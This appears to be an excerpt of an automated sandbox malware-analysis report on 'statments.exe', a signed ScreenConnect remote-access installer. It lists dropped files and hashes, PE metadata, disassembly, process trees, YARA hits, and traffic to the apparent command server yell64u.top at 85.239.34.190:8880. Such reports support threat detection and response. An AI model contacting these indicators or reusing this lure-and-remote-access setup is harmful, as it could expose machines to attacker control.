                                                                                  SHA-512:24FDBD962EBD1E91BB322EA3096FF4B71A79AC0C7F522D505680DACEA9055107A169E02C044AE0D64907279D13B7806F4D53E3C1385C898F402E184653AAF59F
                                                                                  Malicious:false
                                                                                  Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                                  Process:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:modified
                                                                                  Size (bytes):556
                                                                                  Entropy (8bit):5.041874079037299
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOIUiGA/vXbAa3xT:2dL9hK6E46YP6JvH
                                                                                  MD5:4C83DC29C68E989B7DF112C227D50980
                                                                                  SHA1:BBC5D1ADF9B19A033C5632174E89C2F846F9580A
                                                                                  SHA-256:CC9A698161398A3FD98FD4136C135C9FB4000D8F047B89BE4F9576C1876BE356
                                                                                  SHA-512:B8CB3DD8CAB4AB32BB7FF352ADC29A6F8E0CBD7B6C2CE2B26A27C5634233749BE66BA2064176355390F54AC545DA28C68FFE15DBCB4ED5B1C763A41A2A444108
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>yell64u.top=85.239.34.190-17%2f10%2f2024%2018%3a03%3a22</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                  Process:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):556
                                                                                  Entropy (8bit):5.041874079037299
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOIUiGA/vXbAa3xT:2dL9hK6E46YP6JvH
                                                                                  MD5:4C83DC29C68E989B7DF112C227D50980
                                                                                  SHA1:BBC5D1ADF9B19A033C5632174E89C2F846F9580A
                                                                                  SHA-256:CC9A698161398A3FD98FD4136C135C9FB4000D8F047B89BE4F9576C1876BE356
                                                                                  SHA-512:B8CB3DD8CAB4AB32BB7FF352ADC29A6F8E0CBD7B6C2CE2B26A27C5634233749BE66BA2064176355390F54AC545DA28C68FFE15DBCB4ED5B1C763A41A2A444108
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>yell64u.top=85.239.34.190-17%2f10%2f2024%2018%3a03%3a22</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                  Process:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1590
                                                                                  Entropy (8bit):5.363907225770245
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:MxHKQ71qHGIs0HKEHiYHKGSI6oPtHTHhAHKKkhHNpv:iq+wmj0qECYqGSI6oPtzHeqKkhtpv
                                                                                  MD5:E88F0E3AD82AC5F6557398EBC137B0DE
                                                                                  SHA1:20D4BBBE8E219D2D2A0E01DA1F7AD769C3AC84DA
                                                                                  SHA-256:278AA1D32C89FC4CD991CA18B6E70D3904C57E50192FA6D882959EB16F14E380
                                                                                  SHA-512:CA6A7AAE873BB300AC17ADE2394232E8C782621E30CA23EBCE8FE65EF2E5905005EFD2840FD9310FBB20D9E9848961FAE2873B3879FCBC58F8A6074337D5802D
                                                                                  Malicious:false
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):512
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3::
                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):1.797639887720556
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:P8PhVuRc06WX4IFT5tp97qcq56AduNSiAUadZq+ommXrz4VWC5r2AduNSID:OhV14FTvWpYfbadwLmm34C
                                                                                  MD5:3945D7F3025C6E8C25805D401F82E6C8
                                                                                  SHA1:D5AB4D0DC97DFCE6B90E3F65E073CE746EABC516
                                                                                  SHA-256:6E69A138D6BBD179A8A45394CE5691C60C5B12D3F2044AA07233EAA6BDE9C8C3
                                                                                  SHA-512:3A7D70BC3599DF092DE9F67710A84E98C807E3F49C1A2979A62C5B99040F718A29429C48DFA011B5BE59A2402BF9577CA9495E275A1DE41DBFEB16CDE8B37746
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):32768
                                                                                  Entropy (8bit):1.4186244894791478
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:x4tu9O+xFX4NT5hU0p97qcq56AduNSiAUadZq+ommXrz4VWC5r2AduNSID:StmOTXhWpYfbadwLmm34C
                                                                                  MD5:7E2EA820258E3BD25958E841EA798CCA
                                                                                  SHA1:44A2068B156BE583FF22BCFE6CEDFA2B3728B4E9
                                                                                  SHA-256:34D96399928E94616D3CC1610EEBDFA95CDBEB1C98A2FD2FA39EE2333BE84992
                                                                                  SHA-512:6FF8E49EBC8A9CF429986789D7EC5E3C0CC3FED87A9FEB5C9BC174BA6998417AD0ECDFFCCE2194868FDBC9D599FD19BB6A42B56F8605A682F373F56625CC7491
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):32768
                                                                                  Entropy (8bit):0.06903911476825685
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOh2WwcT2OCEyVky6l3X:2F0i8n0itFzDHF8RcT/C23X
                                                                                  MD5:B4F36FE6E570C8C2221AC99E5CF5FA20
                                                                                  SHA1:F0073426E2DF8F7FA7E0504FD7D359FDFF27BA69
                                                                                  SHA-256:F633F01C710EA8D371C18368996F0FF4CBCACDAE0A9CFA88718CA9C8D368D6F0
                                                                                  SHA-512:294B3FCCD8EDDE329E3F1A16EB39CE38971E2A3C94FCBCE767AAA31712320F00643250E74E1753F71E538258F1B730CDD3AAE0A44E2C054FD60DD8BCB4057ED1
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):69632
                                                                                  Entropy (8bit):0.2329722313314201
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:5DBAduNS3qcq56AduNSiAUadZq+ommXrz4VWC5rZPp:9xpYfbadwLmm34l
                                                                                  MD5:DE35F73B4B2605A4B97E94EC2CC56FFE
                                                                                  SHA1:5CADC350B23DCC4C30EB9BD14AE51D7F2D5C3513
                                                                                  SHA-256:7F589D4EBC346293855E09E54CCF321899A53FFF9280E229D53D6AE040DFB805
                                                                                  SHA-512:A2DE3C2308943EF412BFE819B4C82B3F9E34A59568C4103AB59DF4DCCF730DF2D703A72010F1682A129B6BBDC8DEC9768100B149EB88651AADAE46CDCD1DDD88
                                                                                  Malicious:false
                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):7.429483239962031
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:statments.exe
                                                                                  File size:5'652'448 bytes
                                                                                  MD5:95c83010549bc9fe36a625307cf6cd8d
                                                                                  SHA1:67cf78f35d20ba6a07ce771f6092f1efd314e122
                                                                                  SHA256:85276b1893f8307a681f8c8b22c6d7eaa40620afcf987a7a22a4ab39f7300253
                                                                                  SHA512:17e7a37cb3cecfe5c1d19d7e67b91b14dfec17301866d1521a770ecbf4dae87c33776188b420dea2ac437ca101ceae068087eacf712f490ac5a7289e152bff7a
                                                                                  SSDEEP:49152:IDex5xKkEJkGYYpT0+TFiH7efP0x58IJL+md3rHgDNMKLo8SsxG/XcW32gqkAfob:c4s6efPQ53JLbd3LINMLaGUW39f0
                                                                                  TLSH:E846E111B3D995B9C0BF063CD87A52699A74BC048722C7AF57D4BD292D32BC05E323B6
                                                                                  Icon Hash:00928e8e8686b000
                                                                                  Entrypoint:0x4014ad
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:true
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x6377E6AC [Fri Nov 18 20:10:20 2022 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:5
                                                                                  OS Version Minor:1
                                                                                  File Version Major:5
                                                                                  File Version Minor:1
                                                                                  Subsystem Version Major:5
                                                                                  Subsystem Version Minor:1
                                                                                  Import Hash:9771ee6344923fa220489ab01239bdfd
                                                                                  Signature Valid:true
                                                                                  Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                  Signature Validation Error:The operation completed successfully
                                                                                  Error Number:0
Not Before:17/08/2022 02:00:00
Not After:16/08/2025 01:59:59
                                                                                  Subject Chain
                                                                                  • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                                  Version:3
                                                                                  Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                                  Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                                  Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                                  Serial:0B9360051BCCF66642998998D5BA97CE
                                                                                  Instruction
                                                                                  call 00007F0F58B96F7Ah
                                                                                  jmp 00007F0F58B96A2Fh
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  push 00000000h
                                                                                  call dword ptr [0040D040h]
                                                                                  push dword ptr [ebp+08h]
                                                                                  call dword ptr [0040D03Ch]
                                                                                  push C0000409h
                                                                                  call dword ptr [0040D044h]
                                                                                  push eax
                                                                                  call dword ptr [0040D048h]
                                                                                  pop ebp
                                                                                  ret
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  sub esp, 00000324h
                                                                                  push 00000017h
                                                                                  call dword ptr [0040D04Ch]
                                                                                  test eax, eax
                                                                                  je 00007F0F58B96BB7h
                                                                                  push 00000002h
                                                                                  pop ecx
                                                                                  int 29h
                                                                                  mov dword ptr [004148D8h], eax
                                                                                  mov dword ptr [004148D4h], ecx
                                                                                  mov dword ptr [004148D0h], edx
                                                                                  mov dword ptr [004148CCh], ebx
                                                                                  mov dword ptr [004148C8h], esi
                                                                                  mov dword ptr [004148C4h], edi
                                                                                  mov word ptr [004148F0h], ss
                                                                                  mov word ptr [004148E4h], cs
                                                                                  mov word ptr [004148C0h], ds
                                                                                  mov word ptr [004148BCh], es
                                                                                  mov word ptr [004148B8h], fs
                                                                                  mov word ptr [004148B4h], gs
                                                                                  pushfd
                                                                                  pop dword ptr [004148E8h]
                                                                                  mov eax, dword ptr [ebp+00h]
                                                                                  mov dword ptr [004148DCh], eax
                                                                                  mov eax, dword ptr [ebp+04h]
                                                                                  mov dword ptr [004148E0h], eax
                                                                                  lea eax, dword ptr [ebp+08h]
                                                                                  mov dword ptr [004148ECh], eax
                                                                                  mov eax, dword ptr [ebp-00000324h]
                                                                                  mov dword ptr [00414828h], 00010001h
                                                                                  Programming Language:
                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                  • [IMP] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x129c4 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x16000 | 0x533080 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x546200 | 0x1dde0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x54a000 | 0xea8 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x11f20 | 0x70 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x11e60 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xd000 | 0x13c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xb1af | 0xb200 | d9fa6da0baf4b869720be833223490cb | False | 0.6123156601123596 | data | 6.592039633797327 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xd000 | 0x6078 | 0x6200 | 8b45a1035c0de72f910a75db7749f735 | False | 0.41549744897959184 | data | 4.786621464556291 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x14000 | 0x11e4 | 0x800 | 1f4cc86b6735a74429c9d1feb93e2871 | False | 0.18310546875 | data | 2.265083745848167 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x16000 | 0x533080 | 0x533200 | 0cb59c276652808eb7200fdad38bae5b | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x54a000 | 0xea8 | 0x1000 | a93b0f39998e1e69e5944da8c5ff06b1 | False | 0.72265625 | data | 6.301490309336801 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
FILES | 0x163d8 | 0x86000 | PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.39622565881529853
FILES | 0x9c3d8 | 0x1a4600 | PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.5111637115478516
FILES | 0x2409d8 | 0x1ac00 | PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.4415614047897196
FILES | 0x25b5d8 | 0x2ec320 | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.9812068939208984
FILES | 0x5478f8 | 0x1600 | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.3908025568181818
RT_MANIFEST | 0x548ef8 | 0x188 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5892857142857143
DLL | Import
mscoree.dll | CorBindToRuntimeEx
KERNEL32.dll | GetModuleFileNameA, DecodePointer, SizeofResource, LockResource, LoadLibraryW, LoadResource, FindResourceW, GetProcAddress, WriteConsoleW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapReAlloc, HeapSize, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, CreateFileW, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap
OLEAUT32.dll | VariantInit, SafeArrayUnaccessData, SafeArrayCreateVector, SafeArrayDestroy, VariantClear, SafeArrayAccessData
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 17, 2024 20:03:23.880078077 CEST | 49706 | 8880 | 192.168.2.8 | 85.239.34.190
Oct 17, 2024 20:03:23.885236025 CEST | 8880 | 49706 | 85.239.34.190 | 192.168.2.8
Oct 17, 2024 20:03:23.885351896 CEST | 49706 | 8880 | 192.168.2.8 | 85.239.34.190
Oct 17, 2024 20:03:25.183773041 CEST | 49706 | 8880 | 192.168.2.8 | 85.239.34.190
Oct 17, 2024 20:03:25.430960894 CEST | 49706 | 8880 | 192.168.2.8 | 85.239.34.190
Oct 17, 2024 20:03:25.567706108 CEST | 8880 | 49706 | 85.239.34.190 | 192.168.2.8
Oct 17, 2024 20:03:25.568682909 CEST | 8880 | 49706 | 85.239.34.190 | 192.168.2.8
Oct 17, 2024 20:03:25.844679117 CEST | 8880 | 49706 | 85.239.34.190 | 192.168.2.8
Oct 17, 2024 20:03:25.874753952 CEST | 49706 | 8880 | 192.168.2.8 | 85.239.34.190
Oct 17, 2024 20:03:25.879587889 CEST | 8880 | 49706 | 85.239.34.190 | 192.168.2.8
Oct 17, 2024 20:03:26.172477007 CEST | 8880 | 49706 | 85.239.34.190 | 192.168.2.8
Oct 17, 2024 20:03:26.172772884 CEST | 8880 | 49706 | 85.239.34.190 | 192.168.2.8
Oct 17, 2024 20:03:26.172919035 CEST | 49706 | 8880 | 192.168.2.8 | 85.239.34.190
Oct 17, 2024 20:03:27.470788002 CEST | 49706 | 8880 | 192.168.2.8 | 85.239.34.190
Oct 17, 2024 20:03:27.470835924 CEST | 49706 | 8880 | 192.168.2.8 | 85.239.34.190
Oct 17, 2024 20:03:27.475809097 CEST | 8880 | 49706 | 85.239.34.190 | 192.168.2.8
Oct 17, 2024 20:03:27.475824118 CEST | 8880 | 49706 | 85.239.34.190 | 192.168.2.8
Oct 17, 2024 20:03:27.475848913 CEST | 8880 | 49706 | 85.239.34.190 | 192.168.2.8
Oct 17, 2024 20:03:27.475980997 CEST | 8880 | 49706 | 85.239.34.190 | 192.168.2.8
Oct 17, 2024 20:03:27.475992918 CEST | 8880 | 49706 | 85.239.34.190 | 192.168.2.8
Oct 17, 2024 20:03:27.765455961 CEST | 8880 | 49706 | 85.239.34.190 | 192.168.2.8
Oct 17, 2024 20:03:27.837152958 CEST | 49706 | 8880 | 192.168.2.8 | 85.239.34.190
Oct 17, 2024 20:04:27.774779081 CEST | 49706 | 8880 | 192.168.2.8 | 85.239.34.190
Oct 17, 2024 20:04:27.779726028 CEST | 8880 | 49706 | 85.239.34.190 | 192.168.2.8
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 17, 2024 20:03:22.758383989 CEST | 51873 | 53 | 192.168.2.8 | 1.1.1.1
Oct 17, 2024 20:03:23.647327900 CEST | 53 | 51873 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 17, 2024 20:03:22.758383989 CEST | 192.168.2.8 | 1.1.1.1 | 0xb36 | Standard query (0) | yell64u.top | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 17, 2024 20:03:23.647327900 CEST | 1.1.1.1 | 192.168.2.8 | 0xb36 | No error (0) | yell64u.top | | 85.239.34.190 | A (IP address) | IN (0x0001) | false


                                                                                  Target ID:1
                                                                                  Start time:14:03:11
                                                                                  Start date:17/10/2024
                                                                                  Path:C:\Users\user\Desktop\statments.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\statments.exe"
                                                                                  Imagebase:0x410000
                                                                                  File size:5'652'448 bytes
                                                                                  MD5 hash:95C83010549BC9FE36A625307CF6CD8D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000001.00000002.1565481069.0000000005740000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000001.00000000.1521771269.0000000000426000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000001.00000002.1549465731.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:2
                                                                                  Start time:14:03:14
                                                                                  Start date:17/10/2024
                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\de5851ad6e374ce3\setup.msi"
                                                                                  Imagebase:0x620000
                                                                                  File size:59'904 bytes
                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:3
                                                                                  Start time:14:03:14
                                                                                  Start date:17/10/2024
                                                                                  Path:C:\Windows\System32\msiexec.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                  Imagebase:0x7ff7eac90000
                                                                                  File size:69'632 bytes
                                                                                  MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  Target ID:4
                                                                                  Start time:14:03:16
                                                                                  Start date:17/10/2024
                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding AB83296B808D1A3E5D9792E4DDFA12DB C
                                                                                  Imagebase:0x620000
                                                                                  File size:59'904 bytes
                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:5
                                                                                  Start time:14:03:16
                                                                                  Start date:17/10/2024
                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI2F66.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5058640 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                                                  Imagebase:0xf0000
                                                                                  File size:61'440 bytes
                                                                                  MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:6
                                                                                  Start time:14:03:19
                                                                                  Start date:17/10/2024
                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 28425576B87BE497C2D29F2837F582DA
                                                                                  Imagebase:0x620000
                                                                                  File size:59'904 bytes
                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:7
                                                                                  Start time:14:03:20
                                                                                  Start date:17/10/2024
                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding E415C9D2D8304B77F88CF36FA73BEA3D E Global\MSI0000
                                                                                  Imagebase:0x620000
                                                                                  File size:59'904 bytes
                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:8
                                                                                  Start time:14:03:20
                                                                                  Start date:17/10/2024
                                                                                  Path:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe
                                                                                  Wow64 process (32bit):true
